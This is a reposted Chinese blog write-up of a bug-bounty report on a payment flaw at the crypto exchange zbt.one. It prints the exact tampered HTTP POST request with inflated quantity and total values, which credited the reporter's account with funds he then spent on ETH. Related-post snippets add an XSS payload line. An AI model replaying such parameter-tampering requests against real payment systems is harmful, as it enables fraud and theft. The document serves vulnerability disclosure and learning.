【漏洞学习】DVP-2018-02639(支付漏洞)

最新推荐文章于 2025-10-13 09:06:16 发布
原创 最新推荐文章于 2025-10-13 09:06:16 发布 · 211 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细分析了ZBT.C2C平台存在的越权充值漏洞,通过修改POST提交参数,用户能够非法增加账户余额并购买以太坊。文章提供了漏洞利用的具体步骤及代码,并讨论了在审核过程中的修复情况。

漏洞URL:

https://zbt.one/c2c

简要描述:

RT 可以越权修改充值,然后居然会到账,也买了以太坊

漏洞证明:

首先在我的钱包,然后点击充值抓包

然后修改POST提交参数,如图所示

发送数据包

这时候点击确认已汇

不知道为什么过段时间就会自动到账

然后我购买了2个以太坊,

漏洞利用代码:

 post数据包

POST /c2c/buy HTTP/1.1
Host: zbt.one
User-Agent: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: https://zbt.one/c2c
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1

buyUnitPrice=6.5&buyNumber=11111111&cny_total=72222221.50

修复方案:

审核结果:

在审核时漏洞已无法复现,经双方协调,给予 0.5 ETH奖励

精选资源
台达PLC_DVP-ES3系列硬件及使用手册_硬件配置+连线设定+主机运作+软件设定等.pdf
12-25
台达PLC_DVP-ES3系列是一款由台达电子科技公司推出的可编程逻辑控制器,其硬件配置丰富,适用于各种工业自动化应用场景。本手册详细介绍了该系列PLC的硬件配置、连线设定、主机运作以及软件设定等内容,旨在帮助用户...
精选资源
台达PLC_DVP-ES3系列编程手册_装置的定义与指令.pdf
12-25
台达PLC_DVP-ES3系列编程手册主要聚焦于该系列PLC的装置定义与指令,这是一款由中达电通公司推出的可编程逻辑控制器,适用于自动化控制系统的编程和配置。DVP-ES3系列PLC具备丰富的功能和较高的性能,能够满足不同...
4、分布式金融系统的关键考量与创新方案
最新发布
ios99的博客
10-13 13
本文深入探讨了分布式金融系统发展的关键因素,包括HTLC-DvP结算的灵活性与流动性管理、多种隐私保护方案(如Need-to-Know模型、私有通道和加密机制)、以及以分片技术为核心的性能优化路径。同时分析了传统金融市场基础设施(FMIs)在新体系下的角色转型,涵盖智能合约管理、系统安全、风险吸收、数字钱包服务和公证职能。文章还揭示了各要素间的协同关系,并展望了未来分片技术创新、隐私增强技术和与传统金融融合的发展趋势,强调多方协作对推动系统高效、安全、可持续发展的重要性。
什么是DVP?一文告诉你如何应对区块链安全危机
区块链大本营
08-21 5648
存在安全隐患的区块链生态自然成为黑客眼中的香饽饽,近年来,一系列安全事件层出不穷,波及范围和资产损失数额也不断增加。区块链行业的安全问题也愈发引人注目。DVP,全称Dec...
加快二代支付系统建设
sully2008的专栏
07-01 3674
中国现代化支付系统是我国重要的金融基础设施。中国人民银行自2000 年开始研究建设第一代支付系统,近年来相继建成了大额实时支付系统、小额批量支付系统、支票影像交换系统等应用系统。大额实时支付系统采用逐笔发送贷记支付指令,实时全额清算资金,资金汇划不到一分钟即可到账;通过连接各银行业金融机构行内支付系统、中央债券综合业务系统、银行卡支付系统、人民币同业拆借和外汇交易系统等多个系统,为银行业金融机构及
加快二代支付系统建设改进央行支付清算服务
yangzibin的博客
08-16 1264
王关荣   中国现代化支付系统是我国重要的金融基础设施。中国人民银行自2000 年开始研究建设第一代支付系统,近年来相继建成了大额实时支付系统、小额批量支付系统、支票影像交换系统等应用系统。大额实时支付系统采用逐笔发送贷记支 付指令,实时全额清算资金,资金汇划不到一分钟即可到账;通过连接各银行业金融机构行内支付系统、中央债券综合业务系统、银行卡支付系统、人民币同...
在互联网上,没有人知道你是一条狗?
热门推荐
信息安全-企业安全-数据安全
08-22 3万+
1993 年,《纽约客》(The New Yorker)杂志刊登一则由彼得·施泰纳(Peter Steiner)创作的漫画:标题是【On the Internet, nobody knows you’re a dog.】 这则漫画中有两只狗:一只黑狗站在电脑椅上,爪子扶着键盘。它望向站在地上、表情迷茫的另一只狗,兴奋地说:「在互联网上,没人知道你是一条狗。 (On the Internet, nobody knows you’re a dog.)画中那只狗的台词随即成了 IT 界广为流传的经典笑话。 那个
12、金融领域:基础设施、重要性及关键参与者
y7z8a9的博客
08-30 36
本文深入探讨了金融领域的基础设施、其重要性及关键参与者,分析了金融行业在数字化进程中面临的挑战与应对策略。文章还展望了金融行业的未来发展趋势,包括金融科技的融合、开放银行的兴起以及绿色金融的发展。通过加强数据安全防护、网络安全监控、合规管理及技术创新,金融机构能够更好地应对挑战,实现可持续发展。
1、区块链技术在金融市场基础设施中的应用与发展
ios99的博客
10-10 16
本文探讨了区块链技术在金融市场基础设施中的应用与发展。从证券的纸质时代到电子化,再到基于区块链的数字化变革,分析了传统金融基础设施(FMI)与区块链FMI在账户体系、账本形式、价值表示和安全性等方面的差异。重点介绍了区块链在跨境DR、交易所衍生品、场外市场、支付系统等场景的应用方案,并讨论了可信身份、数字信用报告及去中心化金融等配套机制与监管挑战。文章指出,尽管仍面临技术和监管难题,区块链有望推动金融系统向更高效、透明和包容的方向演进。
谷歌原数据保护团队技术主管:零信任实践分享
企业安全
09-02 3万+
本文作者2015至2020年有幸参与了谷歌生产环境零信任(Zero Trust in Production Environments)的理论和实践。在此背景下开发的Binary Authorization for Borg(BAB) 系统已经在谷歌生产环境中实现了全面覆盖:任何人在生产环境中以任何服务的身份运行任何软件包之前,都必须为目标服务建立一个足够强的BAB安全策略。不符合BAB安全策略的程序将不会被允许以相应服务的身份运行。 在实现和推广这种生产环境零信任的过程中,BAB团队走了不少弯
解析香港《稳定币条例》下的数字金融创新实践:监管框架、RWA与数字基建
欢迎来到运通链达的官方博客!我们深度探讨人工智能技术与应用,贯彻科技向善理念,推动科技进步与社会福祉和谐共生。
06-14 1531
【摘要】 香港《稳定币条例草案》的生效标志着其针对法币挂钩稳定币建立了重要的监管框架。本文系统梳理了该条例的核心监管要求,包括价值锚定机制、高合规门槛及沙盒机制;重点分析了基于该框架下的现实世界资产代币化(RWA)创新实践,如充电桩、光伏电站收益权融资案例及其技术实现(区块链+AIoT);探讨了黄金代币化等数字金融创新;并客观讨论了香港数字金融基础设施(如数字人民币跨境支付、CIPS)在支持跨境贸易结算效率提升方面的作用。
精选资源
DVP-PLC-特殊功能模块技术手册
03-15
根据给定的文件信息,本手册详细介绍了DVP-PLC特殊功能模块的技术细节,涵盖从模拟输入模块到通讯模块等多方面的应用。以下为知识点的详细解读: 1. 模拟输入模块(DVP04AD/DVP06AD):模块负责将模拟信号(例如...
精选资源
DVP-EH-数字量模块
03-15
标题“DVP-EH-数字量模块”和描述“介绍了关于DVP-EH-数字量模块的详细说明,提供台达PLC的技术资料的下载”所涉及的知识点...同时,利用网络资源获取最新的技术资料,是深入学习和应用DVP-EH数字量模块的有效手段。
台达可编程控制器(PLC)DVP-EH安装说明.pdf
10-19
台达可编程控制器(PLC)DVP-EH系列是一类高速、多功能的工业自动化控制器,广泛应用于工业生产线和各类自动化设备的控制。本文档提供了DVP-EH系列PLC的安装说明,内容涉及电气规格、功能规格、安装配线、故障排除...
漏洞学习DVP-2018-04149(SQL盲注+XSS)
Fly_鹏程万里
11-21 731
声明:该系列所揭示的漏洞目前厂家已经全部修复,此处发布相关的内容只为提供学习用途,请勿做其他恶意破坏。 漏洞证明: 一、SQL延时盲注: 官网地址:https://www.btwintrade.com 服务器令我无力吐槽,根本不敢用脚本跑,一跑就死,就做个简单的危害证明了。!!!审核大大在复现的时候,对数据库名称进行爆破的时候一定要使用单线程,千万千万别使用多线程,服务器会被直接跑...
漏洞学习DVP-2018-01393(聊天室XSS漏洞
Fly_鹏程万里
01-16 546
漏洞URL:http://new.funcoin.co/ 测试账号:1***************m 密码:t********6 漏洞说明: 登陆测试账号后,点击聊天室: 在聊天室中输入xss payload 刷新一下页面后,移动鼠标到M弹出 漏洞证明: 漏洞利用代码: <aonmouseover=alert(7)>M 修复方案: ...
漏洞学习DVP-2018-01423(XSS+任意用户密码重置)
Fly_鹏程万里
11-21 465
声明:该系列所揭示的漏洞目前厂家已经全部修复,此处发布相关的内容只为提供学习用途,请勿做其他恶意破坏。 一、存储型跨站攻击 1)进入平台账户=>财务管理=>资金账户=>添加一条资金账户信息(以添加ETH账户为例),填写资金账户信息,点击“提交”时抓包,添加攻击js代码: 2)提交后,查看前端页面被攻击效果: 查看浏览器加载内容: 3)XSS平台获取到被害者账...
漏洞学习DVP-2018-16101(假充值漏洞
Fly_鹏程万里
01-16 350
漏洞URL: https://www.mv.cool/ 简要描述: 此交易平台充值的时候给了用户一个手动输入检查充值hash 的选项,用户随意在区块上找一个hash可充值成功。造成任意充值。 漏洞证明: 漏洞利用代码: Test account : xxxxx@xxxxxxx.com Test Password:1xxxxxxxa 我刚注册的一个账户,证明可注册 hash...
漏洞学习DVP-2018-08529(绕过加密登陆任意用户)
Fly_鹏程万里
01-16 303
漏洞URL:https://eos.live/ 简要描述:验证码4位数没时间限制 sha256加密截取的4个字符 脚本加密截取即可 漏洞证明: https://eos.live/ 手机验证码登录4位数 这里验证码是加密的 0000是 b336 看了js是sha256加密 截取字符串第五位数开始截取4个字符 解密0000正好是b336 写个脚本循环0000-9999 ...
DVP-ES2硬件操作与配置指南
"该资源是DVP-ES2系列PLC的操作手册,主要涵盖了硬件方面的内容,包括产品的各个部分的功能、规格、外观尺寸、输入输出端子台配置,以及使用PLC编辑软件进行编程和连接的方法。此外,还涉及了设备的安装、电源配线、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值